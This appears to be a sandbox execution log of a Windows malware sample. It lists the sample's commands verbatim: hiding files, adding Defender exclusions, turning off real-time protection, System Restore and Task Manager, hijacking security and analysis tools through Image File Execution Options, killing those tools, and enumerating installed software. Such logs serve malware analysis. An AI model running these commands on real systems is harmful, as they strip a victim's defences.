WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\system32\attrib.exe
attrib +h C:\Users\Admin\Oracle
2⤵
- Views/modifies file attributes
PID:1712

C:\Windows\system32\attrib.exe
attrib +h +r +s C:\Users\Admin\.ntusernt.ini
2⤵
- Views/modifies file attributes
PID:1808

C:\Windows\system32\attrib.exe
attrib -s -r C:\Users\Admin\vIXib\Desktop.ini
2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1392

C:\Windows\system32\attrib.exe
attrib +s +r C:\Users\Admin\vIXib\Desktop.ini
2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1820

C:\Windows\system32\attrib.exe
attrib -s -r C:\Users\Admin\vIXib
2⤵
- Views/modifies file attributes
PID:1848

C:\Windows\system32\attrib.exe
attrib +s +r C:\Users\Admin\vIXib
2⤵
- Views/modifies file attributes
PID:1404

C:\Windows\system32\attrib.exe
attrib +h C:\Users\Admin\vIXib
2⤵
- Views/modifies file attributes
PID:1792

C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\Admin\vIXib\FXswr.class
2⤵
- Views/modifies file attributes
PID:1852

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
3⤵
- Checks for installed software on the system
PID:1876

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
3⤵
- Checks for installed software on the system
PID:1492

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
2⤵
- Kills process with taskkill
PID:1612

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
2⤵
PID:1580

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\vIXib','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\vIXib\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1920

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
2⤵
PID:1972

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1940

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
2⤵
- System policy modification
PID:1052

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:2024

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
2⤵
- System policy modification
PID:796

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1056

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
2⤵
PID:1500

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1528

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
2⤵
PID:736

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1196

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:388

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
3⤵
- Checks for installed software on the system
PID:1088

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
3⤵
- Checks for installed software on the system
PID:1084

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1840

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
2⤵
PID:1608

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1392

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
2⤵
PID:1652

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
2⤵
- Kills process with taskkill
PID:1884

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1552

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
2⤵
PID:1964

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1032

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:524

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:1944

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1796

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1400

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1828

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:756

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1532

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:332

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
2⤵
- Kills process with taskkill
PID:2004

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1528

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1072

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1524

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1996

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:536

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
2⤵
- Kills process with taskkill
PID:2036

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
2⤵
- Kills process with taskkill
PID:1400

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
2⤵
- Kills process with taskkill
PID:616

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1532

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
3⤵
- Checks for installed software on the system
PID:1776

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
3⤵
PID:1632

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1924

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
3⤵
PID:800

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
3⤵
PID:1516

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1072

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
3⤵
PID:2024

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
3⤵
PID:1168

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1120

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
3⤵
PID:1808

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
3⤵
PID:1652

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
2⤵
- Kills process with taskkill
PID:1032

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2032

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
3⤵
PID:1588

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
3⤵
PID:1612

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1640

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
3⤵
PID:1096

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
3⤵
PID:2020

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1680

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
3⤵
PID:1616

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
3⤵
PID:1780

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1884

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
3⤵
PID:1940

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
3⤵
PID:1948

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1752

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
3⤵
PID:1400

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
3⤵
PID:1936

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1772

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
3⤵
PID:296

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
3⤵
PID:2008

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2028

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
3⤵
PID:1920

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
3⤵
PID:1816

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1768

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
3⤵
- Checks for installed software on the system
PID:736

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
3⤵
PID:1796

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1088

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
3⤵
- Checks for installed software on the system
PID:1220

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
3⤵
PID:1408

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1632

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
3⤵
PID:1524

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
3⤵
PID:1580

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1840

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
3⤵
- Checks for installed software on the system
PID:2024

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
3⤵
PID:1876

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:536

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
3⤵
PID:832

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
3⤵
PID:1652

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1972

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
3⤵
- Checks for installed software on the system
PID:1548

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
3⤵
PID:1932

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:288

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
3⤵
PID:1032

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
3⤵
PID:556

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2036

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
3⤵
- Checks for installed software on the system
PID:2020

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
3⤵
PID:1656

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
2⤵
- Kills process with taskkill
PID:1196

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:704

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
3⤵
- Checks for installed software on the system
PID:1064

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
3⤵
PID:1844

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:296

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
3⤵
- Checks for installed software on the system
PID:1888

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
3⤵
PID:1824

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1816

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
3⤵
- Checks for installed software on the system
PID:1036

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
3⤵
PID:616

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1212

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
3⤵
- Checks for installed software on the system
PID:1220

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
3⤵
PID:1100

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1928

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
3⤵
- Checks for installed software on the system
PID:1580

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
3⤵
PID:1996

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1788

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
3⤵
- Checks for installed software on the system
PID:1552

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
3⤵
PID:832

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1588

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
3⤵
- Checks for installed software on the system
PID:1828

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
3⤵
PID:1932

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1964

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1392

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
3⤵
PID:596

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2020

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1472

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:656

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1556

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:2036

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:784

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1840

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1592

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1884

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2044

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1752

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1584

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1972

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1000

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1072

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:560

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1836

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1948

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
2⤵
- Kills process with taskkill
PID:828

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:332

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1920

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1812

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1796

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1408

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
3⤵
PID:1220

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1516

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:2024

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
3⤵
PID:1996

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1808

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:268

